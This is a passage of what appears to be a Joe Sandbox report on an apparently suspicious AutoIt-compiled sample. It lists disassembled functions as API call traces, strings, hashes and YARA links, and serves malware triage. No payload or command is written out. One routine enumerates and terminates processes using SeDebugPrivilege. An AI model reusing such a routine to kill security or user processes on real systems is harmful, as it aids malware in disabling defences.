Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B02627

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
Instruction ID: ae09bbbb6b563360615e7eb33daebdffbf2da34ae1decd7393d6a5731c4c8311
Opcode Fuzzy Hash: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
Instruction Fuzzy Hash: EA01D431390610BBFB1067A89C8EF5D3F99EB4EB12F200001F318BF0E1CDE224449A69

Function 00B01803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B01449,?,?,00000000), ref: 00B0180C
HeapAlloc.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01828
GetCurrentProcess.KERNEL32(?,00000000,?,00B01449,?,?,00000000), ref: 00B01830
DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01843
GetCurrentProcess.KERNEL32(00B01449,00000000,?,00B01449,?,?,00000000), ref: 00B0184B
DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B0184E
CreateThread.KERNEL32(00000000,00000000,00B01874,00000000,00000000,00000000), ref: 00B01868

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
Instruction ID: 90d638d9c879a5c06dc8c3eae28ca26b1a5ee483e77677ad4cd6c2133ba22c4d
Opcode Fuzzy Hash: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
Instruction Fuzzy Hash: 1F01BBB5240708BFE710ABA5DC4DF6B3FACEB89B11F108411FA05EB1A1CA70D810DB20

Function 00B2A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00B0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
Part of subcall function 00B0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
Part of subcall function 00B0D4DC: CloseHandle.KERNEL32(00000000), ref: 00B0D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A16D
GetLastError.KERNEL32 ref: 00B2A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B2A268
GetLastError.KERNEL32(00000000), ref: 00B2A273
CloseHandle.KERNEL32(00000000), ref: 00B2A2C4

Strings

SeDebugPrivilege, xrefs: 00B2A18F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
Instruction ID: b64a7699e49730fc8e414259d97ddcee332ee2b2334f93679d8068c5e9db7ba7
Opcode Fuzzy Hash: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
Instruction Fuzzy Hash: 01618E302042529FD720DF18D494F1ABBE5EF45318F18849CE46A9B7A3C776EC49CB92

Function 00B33886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B33925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B3393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B33954
_wcslen.LIBCMT ref: 00B33999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B339C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B339F4

Strings

SysListView32, xrefs: 00B338F7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
Instruction ID: bd2f9f7b345421ccd6f4d283410bfe7642f2413a5586a66d1e6016e3b55fdf54
Opcode Fuzzy Hash: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
Instruction Fuzzy Hash: C741A471A00218ABEB219F64CC45FEF7BE9EF08754F200566F559E7291D7719D80CB90

Function 00B0BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B0BCFD
IsMenu.USER32(00000000), ref: 00B0BD1D
CreatePopupMenu.USER32 ref: 00B0BD53
GetMenuItemCount.USER32(015C5520), ref: 00B0BDA4
InsertMenuItemW.USER32(015C5520,?,00000001,00000030), ref: 00B0BDCC

Strings

0, xrefs: 00B0BCA8
2, xrefs: 00B0BD37

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
Instruction ID: 0225c6be0efb4ea36df9a9bbb03fcab3c49cc55676dad1d34288709793128b96
Opcode Fuzzy Hash: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
Instruction Fuzzy Hash: 5F518C70A00206EBDB20DFA8D889FAEFFF4EF55354F2482A9E411A72D1D7709945CB61

Function 00B0C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B0C913

Strings

question, xrefs: 00B0C8CC
blank, xrefs: 00B0C895
warning, xrefs: 00B0C8FC
stop, xrefs: 00B0C8E4
info, xrefs: 00B0C8B4

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
Instruction ID: 88d5aac780fb02eab6c6202d7953c675cab27e1376fcdb2b154d2040858be893
Opcode Fuzzy Hash: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
Instruction Fuzzy Hash: 9E110A32689306BAE7169B549CC3DBE7FDCDF15354B2041AEF904A62D2E7B49E00526C

Function 00B0ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B0ED2A
_wcslen.LIBCMT ref: 00B0ED3B
_wcslen.LIBCMT ref: 00B0ED79
_wcslen.LIBCMT ref: 00B0EDAF
_wcslen.LIBCMT ref: 00B0EDDF
_wcslen.LIBCMT ref: 00B0EDEF
_wcslen.LIBCMT ref: 00B0EE2B
_wcslen.LIBCMT ref: 00B0EE5A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
Instruction ID: 3247f654447d2c3f8684a3e6cd09d4effc12cdff20ebc49f54fcf7a485a81278
Opcode Fuzzy Hash: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
Instruction Fuzzy Hash: F341C165C1021875DB51EBF4C98AECFB7ACEF05300F11896AE528E3161FB34E245C3A9

Function 00ABF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00ABF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF454

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
Instruction ID: f48f3979648ac037c29d6497a94b66169232784a8ffbed9118fe78df9e0df074
Opcode Fuzzy Hash: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
Instruction Fuzzy Hash: BC411A31608680FEC7398B6D8C887BA7FA9AF56314F2C453CF59767562CA31A880D711

Function 00B32D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B32D1B
GetDC.USER32(00000000), ref: 00B32D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32D2E
ReleaseDC.USER32(00000000,00000000), ref: 00B32D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B32D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B32D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B32DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B32DE1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
Instruction ID: 40a4e64328ed3dd48f64b960fd8415447c4070a453b7caac736e89fa700a0223
Opcode Fuzzy Hash: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
Instruction Fuzzy Hash: 85316D72201614BBEB114F54CC8AFEB3FA9EB09715F144065FE08AB291CA759C50C7A4

Function 00B05622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00B05637
_memcmp.LIBVCRUNTIME ref: 00B05659
_memcmp.LIBVCRUNTIME ref: 00B05671
_memcmp.LIBVCRUNTIME ref: 00B05684
_memcmp.LIBVCRUNTIME ref: 00B0569E
_memcmp.LIBVCRUNTIME ref: 00B056B1
_memcmp.LIBVCRUNTIME ref: 00B056C9
_memcmp.LIBVCRUNTIME ref: 00B056E4

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
Instruction ID: 93830b4aad345ef1e9b9ec060a0ccc2911427af0bd11f485a90adae81c5360ef
Opcode Fuzzy Hash: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
Instruction Fuzzy Hash: C8219861B40A097BD62459118F82FBB37DCEE22384F5400A4FD055AAC2F722ED1089A5

Function 00B24FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00B25007
NULL Pointer assignment, xrefs: 00B2502E, 00B25383

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f53e55839fec5b5c5904e3878d47487bfcba4af5a14592e46911b4cbef8bbbc5
Instruction ID: 1cbb337eb9e91e4b9e87b80fa500b8761dccb30280b6b426f6cf339ecbec70d5
Opcode Fuzzy Hash: f53e55839fec5b5c5904e3878d47487bfcba4af5a14592e46911b4cbef8bbbc5
Instruction Fuzzy Hash: 9FD1B371A0061A9FDF20CF98D881BAEB7F5FF48354F1484A9E919AB291E770DD41CB90

Function 00AE1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AE15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AE17FB,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE16FB

Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AE17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AE1777
__freea.LIBCMT ref: 00AE17A2
__freea.LIBCMT ref: 00AE17AE

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: fc4b47b8827a775d5a7b24e4f534fe2c889a4b56d169700f18718c0f5efc28e1
Instruction ID: 455793d82890471944ff2b22ad155aec0643b6b575f646fe9fb12ea883ea64a7
Opcode Fuzzy Hash: fc4b47b8827a775d5a7b24e4f534fe2c889a4b56d169700f18718c0f5efc28e1
Instruction Fuzzy Hash: 0D91B572E002A69EDF208FB6CD81EEE7BB5AF49750F184659E812E7181DB35DD40CB60

Function 00B24523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B24648
VariantInit.OLEAUT32(?), ref: 00B24749
VariantClear.OLEAUT32(?), ref: 00B24753
VariantClear.OLEAUT32(?), ref: 00B247B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B245D8, 00B24706, 00B247BE
Incorrect Object type in FOR..IN loop, xrefs: 00B2472C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 732f432fabc93a74d4f9671155b95e4fbdd9e68fa68830c6951699bd6f703c3a
Instruction ID: cbb9e1edf6777ec79402e0289d338279e369cb6f8bb1618c77b1430283dfa0de
Opcode Fuzzy Hash: 732f432fabc93a74d4f9671155b95e4fbdd9e68fa68830c6951699bd6f703c3a
Instruction Fuzzy Hash: E2917171A00225ABDF20CFA4D884FAEBBF8EF46714F108599F519AB291D7709D45CFA0

Function 00B11187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B1125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B11284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B112A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B112D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B1135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B113C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B11430

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: a8810be3cd05f2c8c8d74d04dd8548485e531f90b5ce9f665bc1faa759860294
Instruction ID: 851aa296d78ee741550d45d0284e27618ec102de903c174718b2a80b30412379
Opcode Fuzzy Hash: a8810be3cd05f2c8c8d74d04dd8548485e531f90b5ce9f665bc1faa759860294
Instruction Fuzzy Hash: A991EF71A00219AFDB00DFA8D884BFEB7F5FF45714F6448A9E600E7291D774A981CB90

Function 00AB948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
Instruction ID: e6f6722f8762a45557504a901515b8085739183273e059b8a5eac7be9581b4fe
Opcode Fuzzy Hash: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
Instruction Fuzzy Hash: AB912671D40219EFCB14CFA9CD84AEEBBB8FF49320F248155E615B7252D774AA41CB60

Function 00B23947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B2396B
CharUpperBuffW.USER32(?,?), ref: 00B23A7A
_wcslen.LIBCMT ref: 00B23A8A
VariantClear.OLEAUT32(?), ref: 00B23C1F

Part of subcall function 00B10CDF: VariantInit.OLEAUT32(00000000), ref: 00B10D1F
Part of subcall function 00B10CDF: VariantCopy.OLEAUT32(?,?), ref: 00B10D28
Part of subcall function 00B10CDF: VariantClear.OLEAUT32(?), ref: 00B10D34

Strings

AUTOIT.ERROR, xrefs: 00B23A80, 00B23A85
Incorrect Parameter format, xrefs: 00B239A6, 00B23BA1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: f6c8ae987e9a1ff2acc7d913706636b2246351f1241400e9e5299cff0b014a2d
Instruction ID: c698cdb931498e128b36d3608857dab85f8e59ddfc42cd261e6c902d8e529e4d
Opcode Fuzzy Hash: f6c8ae987e9a1ff2acc7d913706636b2246351f1241400e9e5299cff0b014a2d
